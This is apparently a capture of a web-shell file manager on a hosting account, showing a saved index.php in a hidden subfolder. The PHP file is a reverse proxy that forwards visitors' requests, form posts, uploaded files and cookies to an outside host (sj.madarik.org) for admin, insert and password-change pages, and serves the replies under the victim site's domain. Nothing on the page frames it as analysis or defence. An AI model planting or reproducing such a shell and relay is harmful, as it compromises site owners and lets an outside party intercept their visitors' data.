Priority File Manager
📁 public_html
Base Directory:
/home/ecedu/public_html
/home/ecedu/public_html/wp-content/plugins
/home/ecedu/public_html/wp-content
/home/ecedu
/var/www
/var/www/cgi-bin
/var/www/html
public_html
/
new
/
ckad
/home/ecedu/public_html/new/ckad
Name
Type
Size
Actions
📁
..
Folder
-
Delete
Rename
📄
index.php
File
3300
Delete
Rename
Edit
Download
Upload
Create Folder
📝 Editing:
index.php
Size: 3,300 bytes
Lines: 93
Type: .php
💾 Save
Cancel
✕
<?php session_start(); define('COOKIE_FILE', sys_get_temp_dir() . '/proxy_cookies_' . session_id() . '.txt'); $allowedPages = [ 'index.php', 'dashboard.php', 'admin.php', 'insert.php', 'logout.php', 'admin-layout.php','change_password.php', ]; $page = $_GET['page'] ?? 'index.php'; $pageClean = str_replace(['..', "\0", '//'], '', $page); $pageClean = ltrim($pageClean, '/\\'); if (!in_array($pageClean, $allowedPages)) { http_response_code(403); die("غير مسموح بالوصول لهذه الصفحة"); } $remoteBaseUrl ='https://sj.madarik.org/edu/'; $remoteUrl = $remoteBaseUrl . $pageClean; $ch = curl_init($remoteUrl); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true); curl_setopt($ch, CURLOPT_COOKIEFILE, COOKIE_FILE); curl_setopt($ch, CURLOPT_COOKIEJAR, COOKIE_FILE); if ($_SERVER['REQUEST_METHOD'] === 'POST') { $postData = $_POST; if (!empty($_FILES)) { foreach ($_FILES as $key => $file) { $postData[$key] = new CURLFile($file['tmp_name'], $file['type'], $file['name']); } } curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, $postData); } $response = curl_exec($ch); if ($response === false) { http_response_code(500); die("خطأ في الاتصال بالخادم: " . curl_error($ch)); } $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); $headerSize = curl_getinfo($ch, CURLINFO_HEADER_SIZE); $headersRaw = substr($response, 0, $headerSize); $body = substr($response, $headerSize); curl_close($ch); // معالجة Redirect if (in_array($httpCode, [301,302,303,307,308])) { if (preg_match('/Location:\s*(.+)/i', $headersRaw, $matches)) { $location = trim($matches[1]); $redirectPage = basename(parse_url($location, PHP_URL_PATH)); if (in_array($redirectPage, $allowedPages)) { header("Location: ?page=" . urlencode($redirectPage)); exit; } else { http_response_code(403); die("إعادة توجيه غير مصرح بها"); } } } // إعادة إرسال رؤوس مهمة مثل Set-Cookie و Content-Type foreach (explode("\n", $headersRaw) as $header) { if (stripos($header, 'Content-Type:') === 0 || stripos($header, 'Set-Cookie:') === 0) { header(trim($header)); } } // تعديل روابط HTML لجعلها تمر عبر البروكسي (href, src, action) if (stripos($headersRaw, 'Content-Type: text/html') !== false) { $body = preg_replace_callback('/(href|src|action)\s*=\s*([\'"])(.*?)\2/i', function ($matches) use ($allowedPages) { $attr = $matches[1]; $quote = $matches[2]; $url = $matches[3]; if (preg_match('/^(https?:)?\/\//i', $url) || strpos($url, 'mailto:') === 0) { return $matches[0]; } $cleanUrl = ltrim(parse_url($url, PHP_URL_PATH) ?? '', '/\\'); if (in_array($cleanUrl, $allowedPages)) { return "$attr=$quote?page=" . urlencode($cleanUrl) . "$quote"; } return $matches[0]; }, $body); } echo $body;
✅ File saved successfully!